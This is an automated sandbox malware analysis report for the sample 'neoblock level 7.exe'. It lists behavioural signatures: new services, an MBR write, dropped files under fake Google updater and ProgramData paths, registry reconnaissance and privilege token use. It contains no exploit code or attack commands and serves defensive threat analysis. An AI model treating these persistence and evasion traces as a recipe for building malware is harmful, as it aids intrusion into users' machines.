Malware Analysis Report

2024-09-23 10:37

Sample ID 240614-wfl2xs1ald
Target neoblock level 7.exe
SHA256 da0602bb021ceeaeae97ed4268ee25dec1f9edbc482ae72e6768063e5f452226
Tags
bootkit evasion execution persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

da0602bb021ceeaeae97ed4268ee25dec1f9edbc482ae72e6768063e5f452226

Threat Level: Known bad

The file neoblock level 7.exe was found to be: Known bad.

Malicious Activity Summary

bootkit evasion execution persistence

Suspicious use of NtCreateProcessExOtherParentProcess

Suspicious use of NtCreateUserProcessOtherParentProcess

Sets service image path in registry

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: PowerShell

Creates new service(s)

Stops running service(s)

Checks computer location settings

Checks BIOS information in registry

Loads dropped DLL

Executes dropped EXE

Enumerates connected drives

Writes to the Master Boot Record (MBR)

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Launches sc.exe

Drops file in Program Files directory

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of UnmapMainImage

Uses Task Scheduler COM API

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Suspicious use of FindShellTrayWindow

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Modifies Internet Explorer settings

Suspicious use of SendNotifyMessage

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-14 17:52

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-14 17:51

Reported

2024-06-14 17:54

Platform

win10v2004-20240508-en

Max time kernel

136s

Max time network

130s

Command Line

winlogon.exe

Signatures

Creates new service(s)

persistence execution

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" C:\Windows\System32\WaaSMedicAgent.exe N/A

Stops running service(s)

evasion execution

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\N: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\svchost.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PHYSICALDRIVE0 C:\Windows\system32\wbem\wmiprvse.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx C:\Windows\System32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx C:\Windows\System32\svchost.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\ccccc.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Logs\CBS\CBS.log C:\Windows\servicing\TrustedInstaller.exe N/A
File opened for modification C:\Windows\WindowsUpdate.log C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log C:\Windows\system32\svchost.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\System32\mousocoreworker.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\System32\mousocoreworker.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wbem\wmiprvse.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\System32\mousocoreworker.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WaaSMedicAgent.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion C:\Windows\System32\mousocoreworker.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" C:\Windows\system32\sihost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" C:\Windows\system32\sihost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\Explorer.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ccccc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ccccc.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ccccc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ccccc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ccccc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ccccc.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe N/A
N/A N/A C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe N/A
N/A N/A C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\dialer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dialer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
